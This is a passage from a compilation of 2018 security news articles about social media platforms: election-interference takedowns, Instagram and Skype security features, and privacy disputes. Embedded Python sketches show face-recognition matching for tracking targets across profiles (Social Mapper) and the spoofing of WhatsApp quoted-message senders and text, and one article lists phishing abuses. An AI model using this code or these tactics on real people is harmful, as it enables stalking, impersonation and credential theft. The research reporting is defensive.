Sources familiar with the matter said Google offered chief legal officer Kent Walker, who the company said is most knowledgeable on foreign interference, but that senators had asked for the participation of CEO Sundar Pichai or Alphabet CEO Larry Page.

Dorsey testifies later in the day at a hearing of the House Energy and Commerce Committee on online "transparency and accountability."

The tech giants are likely to face a cool reception at best from members of Congress, said Roslyn Layton, an American Enterprise Institute visiting scholar specializing in telecom and internet issues.

"The Democrats are upset about the spread of misinformation in the 2016 election, and the Republicans over the perception of bias," Layton said.

"They are equally angry, but for different reasons."

Kathleen Hall Jamieson, a University of Pennsylvania professor and author of an upcoming book on Russia's role in election hacking, said the hearings could give the companies a platform to explain how they operate.

"Hearings are an opportunity as well as a liability," she said.

"These companies have put in place fixes (on foreign manipulation) but they have done it incrementally, and they have not communicated that to a national audience."


Twitter to Verify Those Behind Hot-button US Issue Ads
4.9.2018 securityweek 
Social

Twitter on Thursday started requiring those behind hot-button issue ads in the US to be vetted as part of the effort by the social network to thwart stealth campaigns aimed at influencing politics.

The tightened ad policy included requiring photos and valid contact information, and prohibited state-owned media or national authorities from buying political ads to be shown on Twitter outside their home countries.

Those placing these Twitter ads will need to be "certified" by the company and meet certain guidelines, and the ads will be labeled as political "issue" messages.

"The intention of this policy is to provide the public with greater transparency into ads that seek to influence people's stance on issues that may influence election outcomes," Twitter executives Del Harvey and Bruce Falck said in a blog post.

The new ad policy came as major technology firms including Facebook, Google and Twitter battle against misinformation campaigns by foreign agents.

Facebook, Twitter, Google and Microsoft recently blocked accounts from Russian and Iranian entities which the companies said were propagating misinformation aimed at disrupting the November US elections.

The new ad policy at Twitter applies to paid messages that identify political candidates or advocate regarding legislative issues of national importance.

Examples of issue topics provided by Twitter included abortion, civil rights, climate change, guns, healthcare, immigration, national security, social security, taxes and trade.

The policy did not apply to news agencies reporting on candidates or issues, rather than advocating outcomes, according to Harvey and Falck.

Silicon Valley executives are set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.


Instagram Introduces New Account Safety Features
30.8.2018 securityweek
Social

Instagram this week announced new features to boost account security and provide users with increased visibility into accounts with a large number of followers.

Instagram will soon provide users with the ability to evaluate the authenticity of an account that reaches large audiences. The information will be accessible through an “About This Account” option in the Profile menu, Mike Krieger, Co-Founder & CTO, explains in a blog post.

Information displayed will include the date the account joined Instagram, the country it is located in, accounts with shared followers, username changes in the last year, and details on the ads the account might be running.

The feature appears to be a reaction to numerous misinformation campaigns that have been exposed over the past few months, some supposedly originating from Russia or Iran.

“Our community has told us that it’s important to them to have a deeper understanding of accounts that reach many people on Instagram, particularly when those accounts are sharing information related to current events, political or social causes, for example,” Krieger notes.

Starting next month, the social platform will allow people with accounts that reach large audiences to review the information about their accounts. Soon after, the “About This Account” feature will become available to the global community.

Additionally, Instagram is allowing accounts that reach large audiences and meet specific criteria to request verification through a form within the Instagram app. The social platform will review the requests “to confirm the authenticity, uniqueness, completeness and notability of each account,” Krieger says.

The verification request form is available by accessing the menu icon in the Profile section, selecting Settings, and then “Request Verification.” Users requesting verification will need to provide the account username, their full name, and a copy of their legal or business identification.

Instagram will review all requests but might decline verification for some accounts. The verification will be performed free of charge and users won’t be contacted to confirm verification.

Soon, the platform will also include support for third-party authenticator apps for those who choose to use such tools to log into their Instagram accounts.

To take advantage of the feature, users would need to access the profile section, tap the menu icon, go to “Settings,” and then select “Authentication App” in the “Two-Factor Authentication” section. If an authentication app is already installed, Instagram will automatically send a login code to it. Users will need to enter the code on Instagram to enable two-factor authentication.
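
Authenticator apps of this kind generally implement TOTP (RFC 6238), in which the service and the app share a secret at enrollment and independently derive the same short-lived code. The following minimal sketch uses the pyotp library with a randomly generated secret; it is not Instagram's implementation.

    import pyotp  # pip install pyotp

    # The shared secret is normally delivered to the user as a QR code at enrollment.
    secret = pyotp.random_base32()
    totp = pyotp.TOTP(secret)

    code = totp.now()                # the 6-digit code the authenticator app shows
    print(code, totp.verify(code))   # the server-side check; True while the code is valid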

According to Krieger, support for third-party authenticator apps is already rolling out to users and should reach all of them in the coming weeks.


Twitter Suspends Accounts Engaged in Manipulation
29.8.2018 securityweek
Social

Twitter this week announced the suspension of a total of 770 accounts for “engaging in coordinated manipulation.”

The suspensions were performed in two waves. One last week, when the social networking platform purged 284 accounts, many of which supposedly originated from Iran, and another this week, when 486 more accounts were kicked for the same reason.

“As with prior investigations, we are committed to engaging with other companies and relevant law enforcement entities. Our goal is to assist investigations into these activities and where possible, we will provide the public with transparency and context on our efforts,” Twitter noted last week.

The micro-blogging platform took action on the accounts after FireEye published a report detailing a large campaign conducted out of Iran focused on influencing the opinions of people in the United States and other countries around the world.

Active since at least 2017, the campaign focused on anti-Israel, anti-Saudi, and pro-Palestine topics, but also included the distribution of stories regarding U.S. policies favorable to Iran, such as the Joint Comprehensive Plan of Action nuclear deal.

The report triggered reactions from large Internet companies, including Facebook and Google. The former removed 652 pages, groups, and accounts suspected of being tied to Russia and Iran, while the latter blocked 39 YouTube channels and disabled six Blogger and 13 Google+ accounts.

“Since our initial suspensions last Tuesday, we have continued our investigation, further building our understanding of these networks. In addition, we suspended an additional 486 accounts for violating the policies outlined last week. This brings the total suspended to 770,” Twitter said on Tuesday.

The social platform also revealed that fewer than 100 of the 770 suspended accounts claimed to be located in the United States, and many were sharing divisive social commentary. These accounts, however, had thousands of followers, on average.

“We identified one advertiser from the newly suspended set that ran $30 in ads in 2017. Those ads did not target the U.S. and the billing address was located outside of Iran. We remain engaged with law enforcement and our peer companies on this issue,” Twitter also said.

In June, Twitter announced a new process designed to improve the detection of spam accounts and bots and also revealed updates to its sign-up process to make it more difficult to register spam accounts. In early August, Duo Security announced a new tool capable of detecting large Twitter botnets.


Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.2018 securityweek
Social  BigBrothers

The Telegram encrypted messenger app said Tuesday that it would cooperate with investigators in terror probes when ordered by courts, except in Russia, where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his third Kremlin term in 2012, ostensibly to fight terrorism, but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned WhatsApp, says it complies with authorities in accordance with "applicable law".


Facebook Pulls Security App From Apple Store Over Privacy
28.8.2018 securityweek
Social

Facebook has pulled one of its own products from Apple's app store because it didn't want to stop tracking what people were doing on their iPhones. Facebook also banned a quiz app from its social network for possible privacy intrusions on about 4 million users.

The twin developments come as Facebook is under intense scrutiny over privacy following the Cambridge Analytica scandal earlier this year. Allegations that the political consultancy used personal information harvested from 87 million Facebook accounts have dented Facebook's reputation.

Since the scandal broke, Facebook has investigated thousands of apps and suspended more than 400 of them over data-sharing concerns.

The social media company said late Wednesday that it took action against the myPersonality quiz app, saying that its creators refused an inspection. But even as Facebook did that, it found its own Onavo Protect security app at odds with Apple's tighter rules for applications.

Onavo Protect is a virtual-private network service aimed at helping users secure their personal information over public Wi-Fi networks. The app also alerts users when other apps use too much data.

Since acquiring Onavo in 2013, Facebook has used it to track what apps people were using on phones. This surveillance helped Facebook detect trendy services, tipping off the company to startups it might want to buy and areas it might want to work on for upcoming features.

Facebook said in a statement that it has "always been clear when people download Onavo about the information that is collected and how it is used."

But Onavo fell out of compliance with Apple's app-store guidelines after they were tightened two months ago to protect the reservoir of personal information that people keep on their iPhones and iPads.

Apple's revised guidelines require apps to get users' express consent before recording and logging their activity on a device. According to Apple, the new rules also "made it explicitly clear that apps should not collect information about which other apps are installed on a user's device for the purposes of analytics or advertising/marketing."

Facebook will still be able to deploy Onavo on devices powered by Google's Android software.

Onavo's ouster from Apple's app store widens the rift between two of the world's most popular companies.

Apple CEO Tim Cook has been outspoken in his belief that Facebook does a shoddy job of protecting its 2.2 billion users' privacy — something that he has framed as "a fundamental human right."

Cook sharpened his criticism following the Cambridge Analytica scandal. He emphasized that Apple would never be caught in the same situation as Facebook because it doesn't collect information about its customers to sell advertising. Facebook CEO Mark Zuckerberg fired back in a separate interview and called Cook's remarks "extremely glib." Zuckerberg implied that Apple caters primarily to rich people with a line of products that includes the $1,000 iPhone X.

Late Wednesday, Facebook said it moved to ban the myPersonality app after it found user information was shared with researchers and companies "with only limited protections in place." The company said it would notify the app's users that their data may have been misused.

It said myPersonality was "mainly active" prior to 2012. Though Facebook has tightened its rules since then, it is only now reviewing those older apps following the Cambridge Analytica scandal.

The app was created in 2007 by researcher David Stillwell and allowed users to take a personality questionnaire and get feedback on the results.

"There was no misuse of personal data," Stillwell said in a statement, adding that "this ban appears to be purely cosmetic." Stillwell said users gave their consent and the app's data was fully anonymized before it was used for academic research. He also rejected Facebook's assertion that he refused to submit to an audit.


Facebook Suspends Hundreds of Apps Over Data Concerns
23.8.2018 securityweek
Social

Facebook on Wednesday said it has suspended more than 400 of the thousands of applications it has investigated to determine whether people's personal information was being improperly shared.

Applications were suspended "due to concerns around the developers who built them or how the information people chose to share with the app may have been used," vice president of product partnerships Ime Archibong said in a blog post.

Apps put on hold at the social network were being scrutinized more closely, according to Archibong.

The app investigation, launched by Facebook in March, stemmed from the Cambridge Analytica data privacy scandal.

Facebook admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for Donald Trump's 2016 presidential campaign.

Archibong said that a myPersonality app was banned by the social network for not agreeing to an audit and "because it's clear that they shared information with researchers as well as companies with only limited protections in place."

Facebook planned to notify the approximately four million members of the social network who shared information with myPersonality, which was active mostly prior to 2012, according to Archibong.

Facebook has modified app data sharing policies since the Cambridge Analytica scandal.

"We will continue to investigate apps and make the changes needed to our platform to ensure that we are doing all we can to protect people’s information," Archibong said.

Britain's data regulator said last month that it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office began investigating the social media giant earlier this year due to the Cambridge Analytica data mishandling.

Cambridge Analytica has denied accusations and has filed for bankruptcy in the United States and Britain.

Silicon Valley-based Facebook last month acknowledged it faces multiple inquiries from regulators about the Cambridge Analytica user data scandal.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg was grilled about the breach in US Congress in April.


Microsoft Rolls Out End-to-End Encryption in Skype
22.8.2018 securityweek
Social

Skype users on the latest version of the messaging application can now take full advantage of end-to-end encryption in their conversations, Microsoft says.

Rolled out under the name Private Conversations, the feature was initially introduced as a preview for a few Skype users in January this year, and is now available in the latest version of Skype on Windows, Mac, Linux, iOS and Android (6.0+). It started arriving on desktops a couple of weeks ago.

Private Conversations, which takes advantage of the industry standard Signal Protocol by Open Whisper Systems, secures text chat messages and audio calls, along with any files the conversation partners share over Skype (including photo, audio, and video files).

Skype has long used TLS (transport-level security) and AES (Advanced Encryption Standard) to encrypt messages in transit, but the addition of end-to-end encryption adds an extra layer of privacy.

Now, not only are the conversation channels secured, but all of the transmitted messages are also kept encrypted while on Microsoft’s servers, meaning that they are only accessible to those engaged in the conversation.
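
The end-to-end property can be illustrated with a short sketch built on public-key authenticated encryption from PyNaCl. It is not the Signal Protocol, which adds key ratcheting and forward secrecy, but it shows why a relay server that never holds the private keys only ever sees ciphertext.

    from nacl.public import PrivateKey, Box  # pip install pynacl

    # Only the two endpoints hold private keys; the relay handles ciphertext only.
    alice_sk, bob_sk = PrivateKey.generate(), PrivateKey.generate()

    ciphertext = Box(alice_sk, bob_sk.public_key).encrypt(b"meet at 6")
    # ...this ciphertext is all a store-and-forward server would ever handle...
    plaintext = Box(bob_sk, alice_sk.public_key).decrypt(ciphertext)
    print(plaintext)  # b'meet at 6'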

Private Conversations, however, can only be accessed on one device at a time, the software giant reveals.

To take advantage of the feature, users simply need to tap or click on New Chat and then select Private Conversation. Next, they need to select the contacts they want to start the private conversation with, and these will receive a notification asking them to accept the invitation.

Once a contact accepts the invitation, the private conversation is available on the devices the invitation was sent from/accepted on.

One can also start a private conversation with a contact they are already chatting with.

Users can also delete private conversations, meaning that all of the content will be erased from the device. They can then pick up the conversation again, without having to send a new invitation.


Facebook Stops Misinformation Campaigns Tied to Iran, Russia
22.8.2018 securityweek
Social

Facebook said Tuesday it stopped stealth misinformation campaigns from Iran and Russia, shutting down accounts as part of its battle against fake news ahead of elections in the United States and elsewhere.

Facebook removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing," according to chief executive Mark Zuckerberg.

While the investigation was ongoing, and US law enforcement notified, content from some of the pages was traced back to Iran, while content from others was tied to groups previously linked to Russian intelligence operations, the social network said.

"We believe they were parts of two sets of campaigns," Zuckerberg said.

The accounts, some of them at Facebook-owned Instagram, were presented as being independent news or civil society groups but were actually working in coordinated efforts, social network firm executives said in a briefing with reporters.

Content posted by accounts targeted Facebook users in Britain, Latin America, the Middle East and the US, according to head of cybersecurity policy Nathaniel Gleicher.

He said that posts by the involved accounts were still being scrutinized and their goals were unclear at this point.

The Facebook investigation was prompted by a tip from cybersecurity firm FireEye regarding a collection of "Liberty Front Press" pages at the social network and other online services.

Facebook linked the pages to Iranian state media through publicly available website registration information, computer addresses and information about account administrators, according to Gleicher.

Among the accounts was one from "Quest 4 Truth" claiming to be an independent Iranian media organization. It was linked to Press TV, an English-language news network affiliated with Iranian state media, Gleicher said.

The first "Liberty Front Press" accounts found were at Facebook were created in 2013 and posted primarily political content focused on the Middle East along with Britain, Latin America and the US.

- Russian military tie -

Facebook also removed a set of pages and accounts linked to sources the US government previously identified as Russian military services, according to Gleicher.

"While these are some of the same bad actors we removed for cybersecurity attacks before the 2016 US election, this more recent activity focused on politics in Syria and Ukraine," Gleicher said.

The accounts were associated with Inside Syria Media Center, which the Atlantic Council and other organizations have identified as covertly spreading pro-Russian and pro-Assad content.

US Senator Richard Burr, a Republican who chairs the select committee on intelligence, said that the halted campaigns further prove that "the goal of these foreign social media campaigns is to sow discord" and "that Russia is not the only hostile foreign actor developing this capability."

Facebook chief operating officer Sheryl Sandberg is among Silicon Valley executives set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.

"We get that 2018 is a very important election year, not just in the US," Zuckerberg responded when asked about the upcoming hearing.

"So this is really serious. This is a top priority for the company."

In July, Facebook shut down more than 30 fake pages and accounts involved in what appeared to be a "coordinated" attempt to sway public opinion on political issues ahead of November midterm elections, but did not identify the source.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied to Russia, which used the platform to spread disinformation ahead of the 2016 US presidential election.


Facebook Announces 2018 Internet Defense Prize Winners
17.8.2018 securityweek
Social

Facebook this week announced the winners of its 2018 Internet Defense Prize. Three teams earned a total of $200,000 this year for innovative defensive security and privacy research.

In previous years, Facebook awarded only one team a prize of $100,000 as part of the initiative. In 2016, the winning team presented research focusing on post-quantum security for TLS, and last year’s winners demonstrated a novel technique of detecting credential spear-phishing attacks in enterprise environments.

Winners of Facebook Internet Defense Prize

Facebook says this year’s submissions were of very high quality so the social media giant has decided to reward three teams instead of just one.

The first prize, $100,000 as in the previous years, was won by a team from imec-DistriNet at Belgian university KU Leuven. Their paper, titled “Who Left Open the Cookie Jar? A Comprehensive Evaluation of Third-Party Cookie Policies,” describes methods that browsers can employ to prevent cross-site attacks and third-party tracking via cookies.

It’s worth mentioning that a different team of researchers from KU Leuven has been credited for discovering the recently disclosed Foreshadow speculative execution vulnerabilities affecting Intel processors.

The second-place team, from Brigham Young University, earned $60,000 for a paper titled “The Secure Socket API: TLS as an Operating System Service.” The research focuses on a prototype implementation that makes it easier for app developers to use cryptography.

“We believe safe-by-default libraries and frameworks are an important foundation for more secure software,” Facebook said.

The third-place team, a group from the Chinese University of Hong Kong and Sangfor Technologies, earned $40,000 for “Vetting Single Sign-On SDK Implementations via Symbolic Reasoning.”

“This work takes a critical look at the implementation of single sign-on code. Single sign-on provides a partial solution to the internet’s over-reliance on passwords. This code is widely used, and ensuring its safety has direct implications for user safety online,” Facebook explained.

Last week, Facebook announced that it had awarded a total of more than $800,000 as part of its Secure the Internet Grants, which the company unveiled in January. Facebook has prepared a total of $1 million for original defensive research, offering grants of up to $100,000 per proposal.


Social Mapper – Correlate social media profiles with facial recognition
10.8.2018 securityaffairs
Social

Trustwave developed Social Mapper an Open Source Tool that uses facial recognition to correlate social media profiles across different social networks.
Security experts at Trustwave have released Social Mapper, a new open-source tool that allows finding a person of interest across social media platforms using facial recognition technology.

The tool was developed to gather intelligence from social networks during penetration tests and is aimed at facilitating social engineering attacks.

Social Mapper facial recognition tool automatically searches for targets across eight social media platforms, including Facebook, Instagram, Twitter, LinkedIn, Google+, VKontakte (The Russian Facebook), and Chinese Weibo and Douban.

An individual can be searched for by providing a name and a picture; the tool allows analysts to conduct the analysis “on a mass scale with hundreds or thousands of individuals” at once.

“Performing intelligence gathering is a time-consuming process, it typically starts by attempting to find a person’s online presence on a variety of social media sites. While this is an easy task for a few, it can become incredibly tedious when done at scale,” Trustwave states in a blog post.

“Introducing Social Mapper an open source intelligence tool that uses facial recognition to correlate social media profiles across a number of different sites on a large scale. Trustwave, which provides ethical hacking services, has successfully used the tool in a number of penetration tests and red teaming engagements on behalf of clients.”

Social Mapper

Social Mapper searches for specific profiles in three stages:

Stage 1—The tool creates a list of targets based on the input you give it. The list can be provided via links in a CSV file, images in a folder or via people registered to a company on LinkedIn.

Stage 2—Once the targets are processed, the second stage of Social Mapper kicks in and automatically starts searching social media sites for the targets online.

This stage can be time-consuming: the search could take over 15 hours for a list of 1,000 people and use a significant amount of bandwidth. For this reason, the experts recommend running the tool overnight on a machine with a good internet connection.

Stage 3—Social Mapper then generates a variety of output, including a CSV file with links to the profile pages of the target list and a visual HTML report.
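The core correlation step is plain face matching between a reference photo and collected profile pictures. The following is an illustrative sketch only (not Social Mapper’s actual code), assuming the open-source face_recognition library; the 0.6 tolerance is that library’s commonly used default.

```python
# Illustrative sketch of the correlation step, not Social Mapper's actual code:
# compare a known photo of the target against candidate profile pictures.
import face_recognition

def best_profile_match(known_photo_path, candidate_photo_paths, tolerance=0.6):
    known_image = face_recognition.load_image_file(known_photo_path)
    known_encodings = face_recognition.face_encodings(known_image)
    if not known_encodings:
        return None  # no face detected in the reference photo
    known_encoding = known_encodings[0]

    best = None
    for path in candidate_photo_paths:
        candidate_image = face_recognition.load_image_file(path)
        for encoding in face_recognition.face_encodings(candidate_image):
            distance = face_recognition.face_distance([encoding], known_encoding)[0]
            if distance <= tolerance and (best is None or distance < best[1]):
                best = (path, distance)
    return best  # (best-matching candidate photo, distance) or None
```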

Of course, this intelligence-gathering tool could be abused by attackers to collect information for use in highly sophisticated spear-phishing campaigns.

Experts from Trustwave warn of potential abuses of Social Mapper that are limited “only by your imagination.” Attackers can use the results obtained with the tool to:

Create fake social media profiles to ‘friend’ the targets and send them links to credential capturing landing pages or downloadable malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.
Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.
Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.
View target photos looking for employee access card badges and familiarise yourself with building interiors.
If you want to start using the tool you can find it for free on GitHub.

Trustwave researcher Jacob Wilkin will present Social Mapper at the Black Hat USA conference today.


Researchers find vulnerabilities in WhatsApp that allow attackers to spread fake news via group chats
9.8.2018 securityaffairs
Social

WhatsApp has been found vulnerable to multiple security flaws that could allow malicious users to spread fake news through group chats.
WhatsApp, the most popular messaging application in the world, has been found vulnerable to multiple security flaws that could allow malicious users to intercept and modify the content of messages sent in both private as well as group conversations.

Researchers at security firm Check Point have discovered several vulnerabilities in the popular instant messaging app WhatsApp; the flaws take advantage of a bug in the app’s security protocols to modify messages.

An attacker could exploit the flaws “to intercept and manipulate messages sent by those in a group or private conversation” as well as “create and spread misinformation”.

The issues affect the way the WhatsApp mobile application communicates with WhatsApp Web and decrypts messages using the protobuf2 protocol.

The flaws allow hackers to abuse the ‘quote’ feature in a WhatsApp group conversation to change the identity of the sender, or alter the content of members’ reply to a group chat, or send private messages to one of the group members disguised as a group message.

Experts pointed out that the flaws cannot be exploited to access the content of end-to-end encrypted messages, and that in order to exploit them the attackers must already be part of the group conversation.

“Check Point researchers have discovered a vulnerability in WhatsApp that allows a threat actor to intercept and manipulate messages sent by those in a group or private conversation.” reads the blog post published by the experts.

“The vulnerability so far allows for three possible attacks:

Changing a reply from someone to put words into their mouth that they did not say.
Quoting a message in a reply to a group conversation to make it appear as if it came from a person who is not even part of the group.
Sending a message to a member of a group that pretends to be a group message but is in fact only sent to this member. However, the member’s response will be sent to the entire group.”
The experts demonstrated the exploitation of the flaws by changing a WhatsApp chat entry sent by one member of a group.

Below is a video PoC of the attack that shows how to modify WhatsApp chats and implement the three different attacks.

The Check Point research team (Dikla Barda, Roman Zaikin, and Oded Vanunu) developed a custom extension for the popular Burp Suite tool, dubbed WhatsApp Protocol Decryption Burp Tool, to intercept and modify encrypted messages in WhatsApp Web.

“By decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to then be able to manipulate them and start looking for security issues.” the experts stated.

The extension is available on GitHub; it requires the attacker to provide their private and public keys.

“The keys can be obtained from the key generation phase from WhatsApp Web before the QR code is generated:” continues the report published by the experts.

“After we take these keys we need to take the “secret” parameter which is sent by the mobile phone to WhatsApp Web while the user scans the QR code:”

Experts demonstrated that, using their extension, an attacker can (a conceptual sketch follows the list):

Change the content of a group member’s reply.
Change the identity of a sender in a group chat. The attack works even if the attacker is not a member of the group. “Use the ‘quote’ feature in a group conversation to change the identity of the sender, even if that person is not a member of the group.”
Send a private message to a group member disguised as a group message; when the recipient replies, their response is visible to the entire group.
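The sketch below is purely conceptual: the field names are hypothetical and do not reflect WhatsApp’s real protobuf2 schema, and the decryption and re-encryption performed by the Burp extension are elided. It only illustrates the kind of “quote” manipulation the researchers describe.

```python
# Conceptual sketch only: hypothetical field names, NOT WhatsApp's real schema.
# The Check Point Burp extension handles the actual decryption/re-encryption;
# this just shows the type of manipulation applied to an intercepted group reply.
def spoof_quoted_message(decrypted_reply):
    """Alter the 'quote' metadata of an intercepted reply before re-encryption."""
    quote = decrypted_reply["context_info"]
    # 1) Change the apparent author of the quoted message (even to a non-member).
    quote["participant"] = "not-a-group-member@example.invalid"
    # 2) Change the quoted text to words the person never wrote.
    quote["quoted_message"]["text"] = "Text the victim never actually sent"
    return decrypted_reply

intercepted = {
    "text": "Agreed, let's do it",
    "context_info": {
        "participant": "real-member@example.invalid",
        "quoted_message": {"text": "Original quoted text"},
    },
}
print(spoof_quoted_message(intercepted))
```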

The experts reported the flaws to WhatsApp, but the company explained that end-to-end encryption is not broken by the attacks.

“We carefully reviewed this issue and it’s the equivalent of altering an email to make it look like something a person never wrote.” WhatsApp said in a statement.

“This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp.”

“These are known design trade-offs that have been previously raised in public, including by Signal in a 2014 blog post, and we do not intend to make any change to WhatsApp at this time,” WhatsApp security team replied to the researchers.

Check Point experts argue that the flaws could be abused to spread fake news and misinformation; for this reason, they believe it is essential to fix them as soon as possible and to put limits on forwarded messages.


Snapchat source Code leaked after an iOS update exposed it
9.8.2018 securityaffairs
Social

Hackers leaked the Snapchat source code on GitHub, after they attempted to contact the company for a reward.
Hackers gained access to the frontend source code of the Snapchat instant messaging app for iOS and leaked it on GitHub.

A GitHub account associated with a person named Khaled Alshehri, who claimed to be from Pakistan and goes online with the handle i5xx, created the GitHub repository titled Source-Snapchat.

After being notified, Snap Inc. has confirmed the authenticity of the source code and asked GitHub to remove it by filing a DMCA (Digital Millennium Copyright Act) request.

“Please provide a detailed description of the original copyrighted work that has allegedly been infringed. If possible, include a URL to where it is posted online.”

“SNAPCHAT SOURCE CODE. IT WAS LEAKED AND A USER HAS PUT IT IN THIS GITHUB REPO. THERE IS NO URL TO POINT TO BECAUSE SNAP INC. DOESN’T PUBLISH IT PUBLICLY.” reads the reply of the company to a question included in the DMCA request.

SnapChat source code

According to Snapchat, the source code was leaked after an iOS update made in May exposed a "small amount" of the app’s source code. The problem was solved, and Snap Inc. assured that the data leak has no impact on Snapchat users.

The hackers who leaked the source code are threatening to release more of it until Snap Inc. replies; they appear to be blackmailing the company.


Two members of the group who leaked the Snapchat source code have been posting messages written in Arabic and English on Twitter.

The two hackers are allegedly based in Pakistan and France; they had expected a bug bounty reward from the company, without success.

At the time of writing, two other forks containing the source code were still present on GitHub; it seems that the code was published just after the iOS update.

Snapchat currently runs an official bug bounty program through HackerOne and has already paid several rewards for critical vulnerabilities in its app.


Facebook Asks Big Banks to Share Customer Details
7.8.2018 securityweek 
Social

Facebook has asked major US banks to share customer data to allow it to develop new services on the social network's Messenger texting platform, a banking source told AFP on Monday.

Facebook had discussions with Chase, JPMorgan, Citibank, and Wells Fargo several months ago, said the source, who asked to remain anonymous.

The Silicon Valley-based social network also contacted US Bancorp, according to the Wall Street Journal, which first reported the news.

Facebook, which has faced intense criticism for sharing user data with many app developers, was interested in information including bank card transactions, checking account balances, and where purchases were made, according to the source.

Facebook confirmed the effort in a statement to AFP, but said it was not asking for transaction data.

"Like many online companies with commerce businesses, we partner with banks and credit card companies to offer services like customer chat or account management," Facebook said.

The goal was to create new ways for Messenger to be woven into, and facilitate, interactions between banks and customers, according to the reports. The smartphone texting service boasts 1.3 billion users.

"The idea is that messaging with a bank can be better than waiting on hold over the phone -- and it's completely opt-in," the statement said.

Citigroup declined to comment regarding any possible discussions with Facebook about Messenger.

"While we regularly have conversations about potential partnerships, safeguarding the security and privacy of our customers' data and providing customer choice are paramount in everything we do," Citigroup told AFP by email.

JPMorgan Chase spokeswoman Patricia Wexler directed AFP to a statement given to the Wall Street Journal saying, "We don't share our customers' off-platform transaction data with these platforms and have had to say 'No' to some things as a result."

Wells Fargo declined to address the news.

Privacy worries

Messenger can be used by businesses to help people keep track of account information such as balances, receipts, or shipping dates, according to the social network.

"We're not using this information beyond enabling these types of experiences -- not for advertising or anything else," Facebook explained in its statement.

"A critical part of these partnerships is keeping people's information safe and secure."

But word that Facebook is fishing for financial information comes amid concerns it has not vigilantly guarded private information.

Facebook acknowledged last month that it was facing multiple inquiries from US and British regulators about a scandal involving the now bankrupt British consultancy Cambridge Analytica.

In Facebook's worst ever public relations disaster, it admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for US President Donald Trump's 2016 election campaign.

Facebook CEO Mark Zuckerberg announced in May he was rolling out privacy controls demanded by European regulators to Facebook users worldwide because "everyone cares about privacy."

The social network is now looking at cooler growth following a years-long breakneck pace.

Shares in Facebook plummeted last week, wiping out some $100 billion, after the firm missed quarterly revenue forecasts and warned growth would be far weaker than previously estimated.

Shares in the social network have regained some ground, and rose 4.4 percent to close at $185.69 on Monday.


Facebook reported and blocked attempts to influence campaign ahead of midterms US elections
2.8.2018 securityweek 
Social

Facebook removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the midterm US elections
Facebook has removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the forthcoming midterm US elections.

Facebook midterm US elections

Facebook is shutting down content and accounts “engaged in coordinated inauthentic behavior”

At this time there is no evidence confirming the involvement of Russia, but intelligence experts suspect that Russian APT groups were behind the operation.

Facebook founder Mark Zuckerberg announced the company’s response to the recently disclosed abuses.

“One of my top priorities for 2018 is to prevent misuse of Facebook,” Zuckerberg said on his own Facebook page.

“We build services to bring people closer together and I want to ensure we’re doing everything we can to prevent anyone from misusing them to drive us apart.”

According to Facebook, “some of the activity is consistent” with Tactics, Techniques and Procedures (TTPs) associated with the Internet Research Agency that is known as the Russian troll farm that was behind the misinformation campaign aimed at the 2016 Presidential election.

“But we don’t believe the evidence is strong enough at this time to make public attribution to the IRA,” Facebook chief security officer Alex Stamos explained to reporters.

Facebook revealed that some 290,000 users followed at least one of the blocked pages.

“Resisters” enlisted support from real followers for an August protest in Washington against the far-right “Unite the Right” group.

According to Facebook, the fake pages were created more than a year ago and in some cases were used to promote real-world events, all but two of which have already taken place.

Just after the announcement, the US Government remarked it will not tolerate any interference from foreign states.

“The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation-state or other malicious actors,” deputy press secretary Hogan Gidley told reporters.

The investigation is still ongoing, but the social media giant decided to disclose early findings to shut down the orchestrated misinformation campaign.

Nathaniel Gleicher, Head of Cybersecurity Policy at Facebook, explained that the threat actors used VPNs and internet phone services to protect their anonymity.

“In total, more than 290,000 accounts followed at least one of these Pages, the earliest of which was created in March 2017. The latest was created in May 2018.
